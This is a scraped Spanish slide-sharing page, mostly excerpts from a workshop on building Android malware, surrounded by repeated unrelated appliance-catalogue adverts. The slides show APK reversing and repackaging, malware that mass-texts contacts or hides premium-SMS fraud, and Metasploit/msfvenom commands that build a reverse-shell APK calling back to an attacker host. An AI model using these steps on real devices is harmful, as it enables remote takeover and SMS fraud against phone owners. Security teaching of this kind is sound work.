Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/talleres/busqueda-de-vulnerabilidades-en-aplicaciones-moviles-android/
Con el incremento desmesurado de dispositivos móviles también crece nuestra preocupación por la seguridad de los usuarios que confiadamente usan aplicaciones de terceros sin ninguna precaución.
En este taller los asistentes aprenderán a usar las herramientas necesarias para identificar las vulnerabilidades más comunes en aplicaciones Android.
El taller abarcará desde la ingeniería inversa de las aplicaciones hasta el análisis de tráfico para la evaluación de servicios web involucrados.
Malware en Android: Discovering, Reversing & ForensicsTelefónica
Índice del libro de la editorial 0XWord dedicado al malware de Android. Escrito por Miguel Ángel García del Moral trata de cubrir cómo funciona el malware en los markets de Android y cuáles son las técnicas para descubrirlo y analizarlo.
Taller de Android para Webconf Latino 2010
- El sistema operativo de android con DEX
- Desarrollo y herramientas de Android (eclipse)
- Herramientas para crear aplicaciones
- Como crear una imagen y el emulador
- Desarrollo nativo en C/C++ para Android
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/talleres/busqueda-de-vulnerabilidades-en-aplicaciones-moviles-android/
Con el incremento desmesurado de dispositivos móviles también crece nuestra preocupación por la seguridad de los usuarios que confiadamente usan aplicaciones de terceros sin ninguna precaución.
En este taller los asistentes aprenderán a usar las herramientas necesarias para identificar las vulnerabilidades más comunes en aplicaciones Android.
El taller abarcará desde la ingeniería inversa de las aplicaciones hasta el análisis de tráfico para la evaluación de servicios web involucrados.
Malware en Android: Discovering, Reversing & ForensicsTelefónica
Índice del libro de la editorial 0XWord dedicado al malware de Android. Escrito por Miguel Ángel García del Moral trata de cubrir cómo funciona el malware en los markets de Android y cuáles son las técnicas para descubrirlo y analizarlo.
Taller de Android para Webconf Latino 2010
- El sistema operativo de android con DEX
- Desarrollo y herramientas de Android (eclipse)
- Herramientas para crear aplicaciones
- Como crear una imagen y el emulador
- Desarrollo nativo en C/C++ para Android
Entornos de Desarrollo para Android
Entorno Eclipse
Versiones de Eclipse
AndroidSDK Manager
Plugins ADT de Android
Configurar plugings ADT
Configurar AVD Manager
Creación de Nuevo Proyecto
Estructura del Proyecto Android
Componentes de Android
Esta presentacion incluye oportunidades de mercado de aplicaciones moviles, A su vez, conceptos de desarrollo movil, utiles para Android, Blackberry, Android, y iPhone.
This presentation contains market opportunities for mobile applications, and an introduction to techniques and demos on application development for Android, Blackberry, and Android.
Curso para adquirir las capacidades necesarias para desarrollar bajo la plataforma Android.
Para más información, visita nuestra página web en:
http://www.slashmobility.com
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador ValenciaAMADO SALVADOR
Descubre el catálogo general de la gama de productos de refrigeración del fabricante de electrodomésticos Miele, presentado por Amado Salvador distribuidor oficial Miele en Valencia. Como distribuidor oficial de electrodomésticos Miele, Amado Salvador ofrece una amplia selección de refrigeradores, congeladores y soluciones de refrigeración de alta calidad, resistencia y diseño superior de esta marca.
La gama de productos de Miele se caracteriza por su innovación tecnológica y eficiencia energética, garantizando que cada electrodoméstico no solo cumpla con las expectativas, sino que las supere. Los refrigeradores Miele están diseñados para ofrecer un rendimiento óptimo y una conservación perfecta de los alimentos, con características avanzadas como la tecnología de enfriamiento Dynamic Cooling, sistemas de almacenamiento flexible y acabados premium.
En este catálogo, encontrarás detalles sobre los distintos modelos de refrigeradores y congeladores Miele, incluyendo sus especificaciones técnicas, características destacadas y beneficios para el usuario. Amado Salvador, como distribuidor oficial de electrodomésticos Miele, garantiza que todos los productos cumplen con los más altos estándares de calidad y durabilidad.
Explora el catálogo completo y encuentra el refrigerador Miele perfecto para tu hogar con Amado Salvador, el distribuidor oficial de electrodomésticos Miele.
Entornos de Desarrollo para Android
Entorno Eclipse
Versiones de Eclipse
AndroidSDK Manager
Plugins ADT de Android
Configurar plugings ADT
Configurar AVD Manager
Creación de Nuevo Proyecto
Estructura del Proyecto Android
Componentes de Android
Esta presentacion incluye oportunidades de mercado de aplicaciones moviles, A su vez, conceptos de desarrollo movil, utiles para Android, Blackberry, Android, y iPhone.
This presentation contains market opportunities for mobile applications, and an introduction to techniques and demos on application development for Android, Blackberry, and Android.
Curso para adquirir las capacidades necesarias para desarrollar bajo la plataforma Android.
Para más información, visita nuestra página web en:
http://www.slashmobility.com
Catalogo Refrigeracion Miele Distribuidor Oficial Amado Salvador ValenciaAMADO SALVADOR
Descubre el catálogo general de la gama de productos de refrigeración del fabricante de electrodomésticos Miele, presentado por Amado Salvador distribuidor oficial Miele en Valencia. Como distribuidor oficial de electrodomésticos Miele, Amado Salvador ofrece una amplia selección de refrigeradores, congeladores y soluciones de refrigeración de alta calidad, resistencia y diseño superior de esta marca.
La gama de productos de Miele se caracteriza por su innovación tecnológica y eficiencia energética, garantizando que cada electrodoméstico no solo cumpla con las expectativas, sino que las supere. Los refrigeradores Miele están diseñados para ofrecer un rendimiento óptimo y una conservación perfecta de los alimentos, con características avanzadas como la tecnología de enfriamiento Dynamic Cooling, sistemas de almacenamiento flexible y acabados premium.
En este catálogo, encontrarás detalles sobre los distintos modelos de refrigeradores y congeladores Miele, incluyendo sus especificaciones técnicas, características destacadas y beneficios para el usuario. Amado Salvador, como distribuidor oficial de electrodomésticos Miele, garantiza que todos los productos cumplen con los más altos estándares de calidad y durabilidad.
Explora el catálogo completo y encuentra el refrigerador Miele perfecto para tu hogar con Amado Salvador, el distribuidor oficial de electrodomésticos Miele.
Catalogo Cajas Fuertes BTV Amado Salvador Distribuidor OficialAMADO SALVADOR
Explora el catálogo completo de cajas fuertes BTV, disponible a través de Amado Salvador, distribuidor oficial de BTV. Este catálogo presenta una amplia variedad de cajas fuertes, cada una diseñada con la más alta calidad para ofrecer la máxima seguridad y satisfacer las diversas necesidades de protección de nuestros clientes.
En Amado Salvador, como distribuidor oficial de BTV, ofrecemos productos que destacan por su innovación, durabilidad y robustez. Las cajas fuertes BTV son reconocidas por su eficiencia en la protección contra robos, incendios y otros riesgos, lo que las convierte en una opción ideal tanto para uso doméstico como comercial.
Amado Salvador, distribuidor oficial BTV, asegura que cada producto cumpla con los más estrictos estándares de calidad y seguridad. Al adquirir una caja fuerte a través de Amado Salvador, distribuidor oficial BTV, los clientes pueden tener la tranquilidad de que están obteniendo una solución confiable y duradera para la protección de sus pertenencias.
Este catálogo incluye detalles técnicos, características y opciones de personalización de cada modelo de caja fuerte BTV. Desde cajas fuertes empotrables hasta modelos de alta seguridad, Amado Salvador, como distribuidor oficial de BTV, tiene la solución perfecta para cualquier necesidad de seguridad. No pierdas la oportunidad de conocer todos los beneficios y características de las cajas fuertes BTV y protege lo que más valoras con la calidad y seguridad que solo BTV y Amado Salvador, distribuidor oficial BTV, pueden ofrecerte.
Catalogo General Electrodomesticos Teka Distribuidor Oficial Amado Salvador V...AMADO SALVADOR
El catálogo general de electrodomésticos Teka presenta una amplia gama de productos de alta calidad y diseño innovador. Como distribuidor oficial Teka, Amado Salvador ofrece soluciones en electrodomésticos Teka que destacan por su tecnología avanzada y durabilidad. Este catálogo incluye una selección exhaustiva de productos Teka que cumplen con los más altos estándares del mercado, consolidando a Amado Salvador como el distribuidor oficial Teka.
Explora las diversas categorías de electrodomésticos Teka en este catálogo, cada una diseñada para satisfacer las necesidades de cualquier hogar. Amado Salvador, como distribuidor oficial Teka, garantiza que cada producto de Teka se distingue por su excelente calidad y diseño moderno.
Amado Salvador, distribuidor oficial Teka en Valencia. La calidad y el diseño de los electrodomésticos Teka se reflejan en cada página del catálogo, ofreciendo opciones que van desde hornos, placas de cocina, campanas extractoras hasta frigoríficos y lavavajillas. Este catálogo es una herramienta esencial para inspirarse y encontrar electrodomésticos de alta calidad que se adaptan a cualquier proyecto de diseño.
En Amado Salvador somos distribuidor oficial Teka en Valencia y ponemos atu disposición acceso directo a los mejores productos de Teka. Explora este catálogo y encuentra la inspiración y los electrodomésticos necesarios para equipar tu hogar con la garantía y calidad que solo un distribuidor oficial Teka puede ofrecer.
En este documento analizamos ciertos conceptos relacionados con la ficha 1 y 2. Y concluimos, dando el porque es importante desarrollar nuestras habilidades de pensamiento.
Sara Sofia Bedoya Montezuma.
9-1.
Catalogo general Ariston Amado Salvador distribuidor oficial ValenciaAMADO SALVADOR
Distribuidor Oficial Ariston en Valencia: Amado Salvador distribuidor autorizado de Ariston, una marca líder en soluciones de calefacción y agua caliente sanitaria. Amado Salvador pone a tu disposición el catálogo completo de Ariston, encontrarás una amplia gama de productos diseñados para satisfacer las necesidades de hogares y empresas.
Calderas de condensación: Ofrecemos calderas de alta eficiencia energética que aprovechan al máximo el calor residual. Estas calderas Ariston son ideales para reducir el consumo de gas y minimizar las emisiones de CO2.
Bombas de calor: Las bombas de calor Ariston son una opción sostenible para la producción de agua caliente. Utilizan energía renovable del aire o el suelo para calentar el agua, lo que las convierte en una alternativa ecológica.
Termos eléctricos: Los termos eléctricos, como el modelo VELIS TECH DRY (sustito de los modelos Duo de Fleck), ofrecen diseño moderno y conectividad WIFI. Son ideales para hogares donde se necesita agua caliente de forma rápida y eficiente.
Aerotermia: Si buscas una solución aún más sostenible, considera la aerotermia. Esta tecnología extrae energía del aire exterior para calentar tu hogar y agua. Además, puede ser elegible para subvenciones locales.
Amado Salvador es el distribuidor oficial de Ariston en Valencia. Explora el catálogo y descubre cómo mejorar la comodidad y la eficiencia en tu hogar o negocio.
1. Taller de Android desde 0 hasta
generar nuestro primer malware
Seguridad e inseguridad en Android
2. Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
3. Sobre mi
Graduada en Sistemas Informáticos.
Auditora de seguridad en el código.
Indra.
Miembro-Fundadora de Gr2Dest.
https://es.linkedin.com/pub/maría-rojo/25/19/8b8
http://ensaladadebits.blogspot.com.es/
http://www.gr2dest.org/
https://github.com/mirojo
10. Componentes Android
Content Provider
Provee de la capacidad para poder compartir información
entre diferentes aplicaciones.
11. IPC
IPC es Inter Process Comunication. Son aquellos mecanismos
que dispone Android para que los componentes se
comuniquen entre sí:
Un intent es la descripción abstracta de una operación que se va a
llevar a cabo. O dicho de otro modo, un Intent es una clase que
permite especificar una Activity a ejecutar, llamando a uno de los
métodos de la clase Activity con ese Intent de parámetro. Esta
considerado como el mecanismo universal para pasar datos entre
procesos.
Bundles: Semejante a la serialización pero más rápido.
Binders: Entidad que permite a las actividades y servicios obtener
referencias a otros servicios. Permite no solo el envío de mensajes a
servicios sino directamente invocar métodos de ellos. El más usado
en RPC-style. Este elemento es una de las piedras angulares en el
patrón de seguridad Android. Se recomienda su uso para entornos
seguros.
13. Android Manifest
Archivo XML que se genera al crear el proyecto, es
imprescindible dado que en están recogidas tocas las
especificaciones, componentes y permisos de todos los
elemento que forman la aplicación.
Entender este archivo no es complejo y sí vital para la
detección de malware.
19. Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
20. Reversing APK
APKTool
Todo en uno.
Muy actualizada.
Deserializa AndroidManifest
Decodifica los recursos
De-construye y construye
http://ibotpeaches.github.io/Apktool/
21. Reversing APK
Dex2Jar
Menos funciones.
Genera un jar desde una APK
Puede generar código Jasmin
Smali es el formato dex usado por la DVM
Jasmin lenguaje en el que se basa Smali, su
sintaxis.
https://github.com/pxb1988/dex2jar
24. Reversing APK
apktool d app.apk
Modificar código smali
apktool.jar b app app2.apk
Firmar la APK
jarsigner -verbose -keystore C:Usersmirojonavaja_negra.jks
-storepass 123456 -keypass 123456
D:AndroidAPKTool201lighterdistapp.apk mirojo
25. Reversing APK
d2j-dex2jar app.apk
Abrir con JD-GUI
File -> Save all Sources (Ctrl+Alt+S)
Abrir con el editor Android Studio, Eclipse…
26. Reversing APK
Problemas:
Hay que montar el proyecto. Copiar las carpetas generadas
con APKTool: assets, res y el AndroidManifest.
No se realiza un reversing completo por lo que no se puede
volver a compilar.
27. Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
29. Creando nuestro malware:
HolaMundo
Dos Activity
Activity 1: Solo muestra un formulario.
Activity 2:
Recorre toda la agenda de contactos.
Manda un SMS a cada uno de ellos.
El mensaje del SMS puede ser maligno.
30. Creando nuestro malware: SMS
Receiver
Abrimos el programa.
Lanza un SMS de forma invisible al usuario a un destino
con un mensaje predefinido. Simulador de SMS de alta en
servicios de pago.
El servicio de pago devuelve un SMS
Se bloquea el SMS para que el usuario no pueda ver el
aviso de mensaje entrante y no sea consciente del timo.
31. Creando nuestro malware: Metasploit
Activamos que Metasploit quede a la escucha.
help search
search platform:android
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST 192.168..
set LPORT
exploit
32. Creando nuestro malware: Metasploit
Creamos el malware de Metasploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=1
92.68.. LPORT=6764 R > navaja.apk
Instalamos el malware en un dispositivo
adb install navaja.apk
https://www.offensive-security.com/metasploit-
unleashed/meterpreter-basics/
33. Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
46. Índice
Sobre mi
Android desde 0
Reversing APKs
Creando nuestro malware: HolaMundo
Creando nuestro malware: SMS Receiver
Creando nuestro malware: Metasploit
Escondiendo el bicho
Pentesting APKs
Porque
Dónde
El futuro
Bibliografía
47. Por qué
Por dinero.
SMS de pago
Fraude de publicidad/BlackSeo
Venta de malware “a la carta”
Venta de datos personales
El límite es tu imaginación.
48. Dónde
Google Play
Markets APPs no oficiales
Foros
Redes sociales/Blogs….
Infectado desde elementos de confianza (Ejemplo
HolaMundo).
P2P
Otra vez… El límite es tu imaginación.